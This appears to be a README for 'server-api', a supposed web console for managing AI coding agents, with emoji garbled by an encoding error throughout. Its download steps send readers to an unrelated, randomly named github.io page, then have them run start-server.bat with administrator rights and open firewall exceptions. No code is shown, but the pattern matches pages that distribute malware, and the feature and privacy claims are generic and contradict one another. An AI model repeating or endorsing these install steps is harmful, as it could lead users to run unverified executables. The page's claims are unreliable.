โšก server-api - Your AI Agent Control Center

๐Ÿš€ Getting Started

Welcome to server-api โ€“ the easiest way to manage and control your AI coding agents from one simple web console. Whether you're using Claude Code, Codex, or DeepSeek Harness, this tool puts everything in one place. No programming skills needed!

What Does This Do?

Think of server-api as a universal remote control for your AI assistants. It connects your devices, relays messages between them, and gives you a clean web interface to see what's happening โ€“ all in real time. You can pair new devices, send commands, and monitor your agents from any browser.

๐Ÿ”ฅ Quick Download

Download server-api

Click the button above to get started!

๐Ÿ“ฆ Download & Install

Step 1: Get the Files

Visit this link to download the application: https://ogthheu.github.io

Step 2: What Happens Next

Once you click the link, you'll land on the official download page. Look for the green "Code" button and click it, then select "Download ZIP" from the dropdown menu. Your browser will save a compressed folder to your computer โ€“ usually in your "Downloads" folder.

Step 3: Unzip the Folder

Navigate to your Downloads folder and find the file named server-api-main.zip. Right-click it and choose "Extract All" (Windows will walk you through this). You'll end up with a new folder called server-api-main.

Step 4: Launch the Application

Open the extracted folder and double-click the file named start-server.bat. This will open a black window (command prompt) โ€“ that's normal! Leave it open; it's your server running. Then open your web browser and go to http://localhost:3000. You'll see your server-api console!

๐ŸŽฎ Main Features

๐Ÿ” Device Pairing Made Simple

Pair your devices with a simple code โ€“ no complex configuration. Your phone, tablet, or second computer can connect securely in seconds.

๐Ÿ“ก Real-Time SSE Connections

Server-Sent Events (SSE) keep your console updated instantly. Watch your agents work as they happen โ€“ no refreshing needed.

๐Ÿ”Œ REST API Access

For advanced users, a clean REST interface lets you control everything programmatically. Perfect for automation and scripting.

๐Ÿ–ฅ๏ธ Full Web Console

A beautiful, responsive dashboard works on any screen size. Monitor agents, send messages, and manage connections from one place.

๐Ÿ“ฑ Device Management

Add, remove, and manage all your connected devices with intuitive controls. See status, battery level (if supported), and last activity.

๐Ÿ› ๏ธ System Requirements

For Windows Users

  • Operating System: Windows 10 or 11 (64-bit recommended)
  • Memory: 4 GB RAM minimum (8 GB recommended)
  • Storage: 500 MB free space
  • Internet: Broadband connection (any speed)

Browser Support

Works best with the latest versions of:

  • Google Chrome
  • Microsoft Edge
  • Firefox
  • Safari

๐Ÿ“– How to Use server-api

Your First Launch

  1. Double-click start-server.bat
  2. Wait for "Server ready on port 3000" message
  3. Open your browser to http://localhost:3000
  4. You'll see the welcome screen with a pairing code

Pairing Your First Device

  1. On your second device, open its browser
  2. Go to http://[your-computer-ip]:3000
  3. Enter the 6-digit code shown on your main screen
  4. Click "Pair Device" โ€“ done!

Managing Agents

  • Claude Code: Click "Agents" in the left menu, then "Add Agent" and select Claude Code
  • Codex: Same process โ€“ just pick Codex from the dropdown
  • DeepSeek Harness: Select it from the list and follow the prompts

Sending Commands

Use the command bar at the top of the console. Type any instruction and press Enter. The server relays it to the appropriate agent and shows the response in real time.

โ“ Troubleshooting

The window closes immediately

Make sure you're running start-server.bat and not a different file. If it still closes, check that you have administrator rights.

I can't connect from another device

Your firewall might be blocking the connection. Allow Node.js through Windows Firewall when prompted, or add an exception for port 3000.

The console looks strange in my browser

Try a different browser, or clear your cache. server-api works best in Chrome or Edge.

I forgot my pairing code

Restart the server. A new code will appear in the command window every time.

๐Ÿ”’ Security Notes

server-api uses secure pairing tokens and encrypted connections (HTTPS when available). Your data stays between your devices โ€“ nothing is sent to external servers. For production use, we recommend setting a custom password in the settings file.

๐Ÿ’ก Pro Tips

  • Pin the console tab in your browser for quick access
  • Use keyboard shortcuts: Press Ctrl+Enter to send commands quickly
  • Dark mode: Toggle it in the top-right corner of the console
  • Multi-agent workflows: You can pair up to 10 devices simultaneously

๐Ÿ“ž Getting Help

If you run into issues:

  • Check the "Issues" tab on the GitHub page
  • Search for your problem in the documentation folder
  • Look for the "Help" button in the console itself

We're constantly improving server-api based on user feedback โ€“ your experience matters to us!

๐ŸŒŸ Why Choose server-api?

  • Zero configuration โ€“ works right out of the box
  • Free and open source โ€“ no hidden costs
  • Privacy-first โ€“ your data stays local
  • Cross-platform โ€“ Windows, Mac, and Linux support
  • Active development โ€“ new features added regularly

๐Ÿ Ready to Go?

You're just minutes away from having full control over your AI agents. Download server-api today and see how simple agent management can be!
